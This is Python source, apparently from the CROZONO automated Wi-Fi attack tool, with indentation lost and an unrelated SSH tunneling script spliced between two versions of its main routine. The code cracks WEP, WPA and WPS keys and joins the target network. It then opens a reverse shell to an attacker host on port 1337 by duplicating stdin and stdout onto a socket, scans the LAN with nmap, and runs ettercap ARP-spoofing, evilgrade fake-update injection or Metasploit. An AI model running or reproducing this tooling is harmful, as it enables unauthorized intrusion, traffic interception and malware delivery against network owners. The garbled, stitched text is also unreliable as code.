def connect(essid, key, iface_mon=None):
import fcntl
import struct
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tries = 0
if iface_mon is not None:
call(['airmon-ng', 'stop', iface_mon], stdout=DN, stderr=DN)
time.sleep(1)
iface = get_ifaces()[0]
def do_connect():
nonlocal sock
nonlocal tries
info("Connecting to '{0}' with key '{1}'".format(essid, key if key is not None else ''))
cmd_connect = pexpect.spawn('iwconfig {0} essid "{1}" key s:{2}'.format(iface, essid, key))
cmd_connect.logfile = open(LOG_FILE, 'wb')
cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
cmd_connect.close()
parse_log_connect = open(LOG_FILE, 'r')
for line in parse_log_connect:
if line.find('Error') != -1:
wpa_supplicant = open('/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
wpa_supplicant.write('ctrl_interface=/var/run/wpa_supplicant\n')
wpa_supplicant.write('network={\n')
wpa_supplicant.write('ssid="' + essid + '"\n')
wpa_supplicant.write('key_mgmt=WPA-PSK\n')
wpa_supplicant.write('psk="' + key.strip() + '"\n')
wpa_supplicant.write('}')
wpa_supplicant.close()
call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN)
call(['dhclient', iface, '-r'], stdout=DN, stderr=DN)
call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
call(['iwconfig', iface, 'mode', 'managed'])
call(['killall', 'wpa_supplicant'], stdout=DN, stderr=DN)
call(['wpa_supplicant', '-B', '-c', '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', iface], stdout=DN,
stderr=DN)
time.sleep(2)
parse_log_connect.close()
os.remove(LOG_FILE)
tries += 1
call(['dhclient', iface], stdout=DN, stderr=DN)
time.sleep(4)
do_connect()
if get_current_essid(iface) != essid and tries < 5:
warn('Connection to {e} failed. Retrying.'.format(e=essid))
do_connect()
if get_current_essid(iface) == essid:
ipaddr = socket.inet_ntoa(
fcntl.ioctl(sock.fileno(), 0x8915, struct.pack('256s', bytes(iface[:15], 'utf-8')))[20:24])
info('Connection to {e} succeeded! Our IP is: {i}'.format(e=essid, i=ipaddr))
return ipaddr
else:
error('Could not connect to {e} after 5 tries. Aborting'.format(e=essid))
exit(1)
def connect_to_lan():
import fcntl
import struct
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tries = 0
if settings.INTERFACE_MON is not None:
device_mgr.toggle_mode_monitor(False)
time.sleep(1)
def do_connect():
nonlocal sock
nonlocal tries
info("Connecting to '{0}' with key '{1}'".format(settings.TARGET_ESSID, settings.TARGET_KEY if settings.TARGET_KEY is not None else ''))
cmd_connect = pexpect.spawn('iwconfig {0} essid "{1}" key s:{2}'.format(settings.INTERFACE, settings.TARGET_ESSID, settings.TARGET_KEY))
cmd_connect.logfile = open(settings.LOG_FILE, 'wb')
cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
cmd_connect.close()
parse_log_connect = open(settings.LOG_FILE, 'r')
for line in parse_log_connect:
if line.find('Error') != -1:
wpa_supplicant = open('/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
wpa_supplicant.write('ctrl_interface=/var/run/wpa_supplicant\n')
wpa_supplicant.write('network={\n')
wpa_supplicant.write('ssid="' + settings.TARGET_ESSID + '"\n')
wpa_supplicant.write('key_mgmt=WPA-PSK\n')
wpa_supplicant.write('psk="' + settings.TARGET_KEY.strip() + '"\n')
wpa_supplicant.write('}')
wpa_supplicant.close()
subprocess.call(['ifconfig', settings.INTERFACE, 'down'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.call(['dhclient', settings.INTERFACE, '-r'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.call(['ifconfig', settings.INTERFACE, 'up'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.call(['iwconfig', settings.INTERFACE, 'mode', 'managed'])
subprocess.call(['killall', 'wpa_supplicant'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.call(['wpa_supplicant', '-B', '-c', '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', settings.INTERFACE], stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
time.sleep(2)
parse_log_connect.close()
os.remove(settings.LOG_FILE)
tries += 1
subprocess.call(['dhclient', settings.INTERFACE], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
time.sleep(4)
do_connect()
if get_current_essid() != settings.TARGET_ESSID and tries < 5:
warn('Connection to {e} failed. Retrying.'.format(e=settings.TARGET_ESSID))
do_connect()
if get_current_essid() == settings.TARGET_ESSID:
ipaddr = socket.inet_ntoa(
fcntl.ioctl(sock.fileno(), 0x8915, struct.pack('256s', bytes(settings.INTERFACE[:15], 'utf-8')))[20:24])
info('Connection to {e} succeeded! Our IP is: {i}'.format(e=settings.TARGET_ESSID, i=ipaddr))
settings.IP_LAN = ipaddr.strip()
else:
error('Could not connect to {e} after 5 tries. Aborting'.format(e=settings.TARGET_ESSID))
exit(1)
def logout(timeout: int):
global session
session.sendline('exit')
r = session.expect([pexpect.EOF, 'Connection to', pexpect.TIMEOUT], timeout=timeout)
if r in (0, 1):
return True
else:
session.sendline('kill -9 $$')
log.warn('Connection killed itself')
return False
def set_up_logging():
global logging
global session
if logging is None:
return
if logging.get('file') is not None:
# TODO: Log to file
log.error('Log to file no implemented. Yet.')
elif logging.get('console'):
session.logfile = sys.stdout
else:
log.warn('Logging disabled')
def main():
banner()
if not check_root():
error('You need root privileges to run CROZONO!\n')
exit(1)
if not check_wlan_attacks_dependences():
exit(1)
info("CROZONO running...")
args = parse_args()
if args.essid is not None:
if args.key is not None:
ap_target = False
ip_lan = connect(args.essid, args.key)
else:
iface_mon = hardware_setup()
new_mac = mac_changer(iface_mon)
ap_target = scan_targets(iface_mon, args.essid)
else:
iface_mon = hardware_setup()
new_mac = mac_changer(iface_mon)
ap_target = scan_targets(iface_mon)
# -------------------- Infiltrate wifi --------------------
if ap_target:
target_essid = ap_target.get('ESSID').strip()
target_bssid = ap_target.get('BSSID').strip()
target_channel = ap_target.get('channel').strip()
target_privacy = ap_target.get('Privacy').strip()
info("Target selected: " + target_essid)
if target_privacy == 'WEP':
info("Cracking {e} access point with WEP privacy...".format(e=target_essid))
key = wep_attack(target_essid, target_bssid, target_channel, new_mac, iface_mon)
if not key:
error("Key not found! :(")
exit()
else:
info("Key found!: {k} ".format(k=key))
save_key(target_essid, key)
ip_lan = connect(target_essid, key, iface_mon)
elif target_privacy == 'WPA' or target_privacy == 'WPA2' or target_privacy == 'WPA2 WPA':
info("Cracking {e} access point with {p} privacy...".format(e=target_essid, p=target_privacy))
wps = wps_check(target_bssid, iface_mon)
if wps:
info("WPS is enabled")
key = wpa_with_wps_attack(target_bssid, target_channel, iface_mon)
if not key:
warn("PIN not found! Trying with conventional WPA attack...")
key = wpa_attack(target_bssid, target_channel, iface_mon)
else:
warn("WPS is not enabled")
key = wpa_attack(target_bssid, target_channel, iface_mon)
if not key:
error("Key not found! :(")
exit()
else:
info("Key found!: {k} ".format(k=key))
save_key(target_essid, key)
ip_lan = connect(target_essid, key, iface_mon)
else:
info("Open network!")
ip_lan = connect(target_essid, None, iface_mon)
# -------------------- Acquired LAN range --------------------
ip_lan = ip_lan.strip()
net = ip_lan.split('.')
range_net = net[0] + '.' + net[1] + '.' + net[2] + '.1-255'
# -------------------- Connect to attacker and relay nmap info --------------------
if os.path.exists(OS_PATH + '/cr0z0n0_nmap'):
os.remove(OS_PATH + '/cr0z0n0_nmap')
if not check_lan_attacks_dependences():
exit(1)
attacker = args.dest
if attacker is not None:
info("Sending information about network to attacker ({ip}) and running attacks...".format(ip=attacker))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((attacker, 1337))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
banner()
info("Hello! :)")
info("Executing Nmap...")
call(['nmap', '-O', '-sV', '-oN', 'cr0z0n0_nmap', '--exclude', ip_lan, range_net], stderr=DN)
else:
warn("Attacker not defined! Ending...")
exit()
# -------------------- Attacks --------------------
attack = args.attack
if attack == 'sniffing-mitm':
iface = get_ifaces()[0]
gateway = get_gateway().strip()
target_mitm = get_target_mitm(gateway, ip_lan)
info("Executing MITM and Sniffing attacks between {g} and {m}...".format(g=gateway, m=target_mitm))
cmd_ettercap = pexpect.spawn(
'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i}'.format(g=gateway, m=target_mitm, i=iface))
time.sleep(2)
# cmd_tshark = pexpect.spawn('tshark -i {i} -w cr0z0n0_sniff'.format(i=iface))
proc = subprocess.call(["tshark", "-i", iface], stderr=DN)
elif attack == 'evilgrade':
modules = open(OS_PATH + '/evilgrade/modules.txt', 'r')
agent = OS_PATH + '/evilgrade/agent.exe'
for line in modules:
print(line.replace('\n', ''))
print("\n\n Select module to use: ")
plugin = input()
info("Thank you! Evilgrade will be executed!")
s.shutdown(1)
if os.path.exists('/etc/ettercap/etter.dns'):
call(['rm', '/etc/ettercap/etter.dns'])
etter_template = open(OS_PATH + '/evilgrade/etter.dns.template', 'r')
etter_dns = open(OS_PATH + '/evilgrade/etter.dns', 'w')
for line in etter_template:
line = line.replace('IP', ip_lan)
etter_dns.write(line)
etter_dns.close()
etter_template.close()
call(['mv', './evilgrade/etter.dns', '/etc/ettercap/etter.dns'])
evilgrade = pexpect.spawn('evilgrade')
evilgrade.expect('evilgrade>')
evilgrade.sendline('configure ' + plugin)
evilgrade.sendline('set agent ' + agent)
evilgrade.sendline('start')
time.sleep(1)
iface = get_ifaces()[0]
gateway = get_gateway().strip()
target_mitm = get_target_mitm(gateway, ip_lan)
cmd_ettercap = pexpect.spawn(
'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i} -P dns_spoof'.format(g=gateway, m=target_mitm, i=iface))
time.sleep(EVILGRADE_ATTACK_TIME)
elif attack == 'metasploit':
info("Executing Metasploit...")
proc = subprocess.call(["msfconsole"], stderr=DN)
else:
warn("Attack not defined!")
s.shutdown(1)
info("CROZONO has finished! Good bye! ;)")
def main():
global session
global logging
global disconnection_timeout
c = args.config
log.info('Using: {}'.format(os.path.join(os.path.dirname(os.path.abspath(c)), c)))
with open(c) as f:
config = yaml.load(f)
logging = config.get('logging')
tunnels = config.get('tunnels')
all_tunnels = []
[all_tunnels.append(Tunnel(t)) for t in tunnels]
hops = config.get('hops')
for i, hop in enumerate(hops):
pid_stack = []
key = list(hop.keys())[0]
h = hop[key]
hop = Hop(key, h, i)
tunnels = []
if hop.key_auth:
if hop.index == len(hops) - 1:
[tunnels.append(each.mapping) for each in all_tunnels]
else:
for tun in all_tunnels:
tunnels.append(tun.get_localhost_mapping())
p = connect_with_key(hop.host, hop.user, hop.auth, tunnels)
pid_stack.append(p)
else:
if hop.index == len(hops) - 1:
[tunnels.append(each.mapping) for each in all_tunnels]
else:
for tun in all_tunnels:
tunnels.append(tun.get_localhost_mapping())
p = connect_with_password(hop.host, hop.user, hop.auth, tunnels)
pid_stack.append(p)
session.sendline('while [ 1=1 ]; do echo \'keepalive\' ; sleep 3 ; done')
log.info('Tunneling done:')
[log.info(t) for t in all_tunnels]
# TODO: Watch for broken pipe?
try:
input("Press ENTER to disconnect")
print()
except KeyboardInterrupt:
log.error('Getting out of here!')
disconnection_timeout = 0
for h in reversed(hops):
alias = list(h.keys())[0]
log.info("Disconnecting from {}".format(alias))
try:
r = logout(disconnection_timeout)
except KeyboardInterrupt:
log.warn("Hurrying up.")
r = None
disconnection_timeout = 0
if r:
log.info('Disconnected')
else:
log.warn('Connection forcefully closed')
try:
os.kill(pid_stack[0], signal.SIGKILL)
log.warn('Killed off remaining SSH process')
except ProcessLookupError:
pass
log.info('Done')
def main():
banner()
if not checks.check_root():
error('You need root privileges to run CROZONO!\n')
exit(1)
if not checks.check_wlan_attacks_dependencies():
exit(1)
args = parse_args()
info("CROZONO running...")
settings.OS_PATH = os.getcwd()
settings.INTERFACE = args.interface if args.interface is not None else settings.INTERFACE
settings.INTERFACE = device_mgr.get_ifaces()[0] if settings.INTERFACE is None else settings.INTERFACE
settings.TARGET_ESSID = args.essid if args.essid is not None else settings.TARGET_ESSID
settings.TARGET_KEY = args.key if args.key is not None else settings.TARGET_KEY
settings.IP_ATTACKER = args.dest if args.dest is not None else settings.IP_ATTACKER
settings.ATTACK = args.attack if args.attack is not None else settings.ATTACK
if settings.TARGET_ESSID is not None:
if settings.TARGET_KEY is not None:
ap_target = None
lan_mgr.connect_to_lan()
else:
device_mgr.hardware_setup()
ap_target = airodump.scan_targets()
else:
device_mgr.hardware_setup()
ap_target = airodump.scan_targets()
# -------------------- Infiltrate wifi --------------------
if ap_target is not None:
settings.TARGET_ESSID = ap_target.get('ESSID').strip()
settings.TARGET_BSSID = ap_target.get('BSSID').strip()
settings.TARGET_CHANNEL = ap_target.get('channel').strip()
settings.TARGET_PRIVACY = ap_target.get('Privacy').strip()
info("Target selected: " + settings.TARGET_ESSID)
if settings.TARGET_PRIVACY == 'WEP':
from src.attacks import wep_attack
info("Cracking {e} access point with WEP privacy...".format(e=settings.TARGET_ESSID))
wep_attack.run()
if settings.TARGET_KEY is None:
error("Key not found! :(")
exit()
else:
info("Key found!: {k} ".format(k=settings.TARGET_KEY))
lan_mgr.save_key()
lan_mgr.connect_to_lan()
elif settings.TARGET_PRIVACY == 'WPA' or settings.TARGET_PRIVACY == 'WPA2' or settings.TARGET_PRIVACY == 'WPA2 WPA':
from src.attacks import wpa_attack,wps_attack
info("Cracking {e} access point with {p} privacy...".format(e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY))
wps = wps_attack.check()
if wps:
info("WPS is enabled")
wps_attack.pixiedust()
if settings.TARGET_KEY is None:
warn("PIN not found! Trying with conventional WPA attack...")
wpa_attack.run()
else:
warn("WPS is not enabled")
wpa_attack.run()
if settings.TARGET_KEY is None:
error("Key not found! :(")
exit(1)
else:
info("Key found!: {k} ".format(k=settings.TARGET_KEY))
lan_mgr.save_key()
lan_mgr.connect_to_lan()
else:
info("Open network!")
lan_mgr.connect_to_lan()
# -------------------- Acquired LAN range -----------------------------------------
lan_mgr.lan_range()
lan_mgr.get_gateway()
# -------------------- Connect to attacker and relay NMap info --------------------
if os.path.exists(settings.OS_PATH + '/cr0z0n0_nmap'):
os.remove(settings.OS_PATH + '/cr0z0n0_nmap')
if not checks.check_lan_attacks_dependencies():
exit(1)
if settings.IP_ATTACKER is not None:
info("Sending information about network to attacker ({ip}) and running attacks...".format(ip=settings.IP_ATTACKER))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((settings.IP_ATTACKER, settings.PORT_ATTACKER))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
banner()
info("Hello! :)")
info("Executing Nmap...")
subprocess.call(['nmap', '-O', '-sV', '-oN', 'cr0z0n0_nmap', '--exclude', settings.IP_LAN, settings.LAN_RANGE], stderr=subprocess.DEVNULL)
else:
warn("Attacker not defined! Ending up...")
exit()
# -------------------- Attacks --------------------
if settings.ATTACK == 'sniffing-mitm':
from src.attacks import sniffing_mitm
sniffing_mitm.run()
elif settings.ATTACK == 'metasploit':
from src.attacks import metasploit
metasploit.run()
else:
warn("Attack not defined!")
s.shutdown(1)
info("CROZONO has finished! Good bye! ;)")
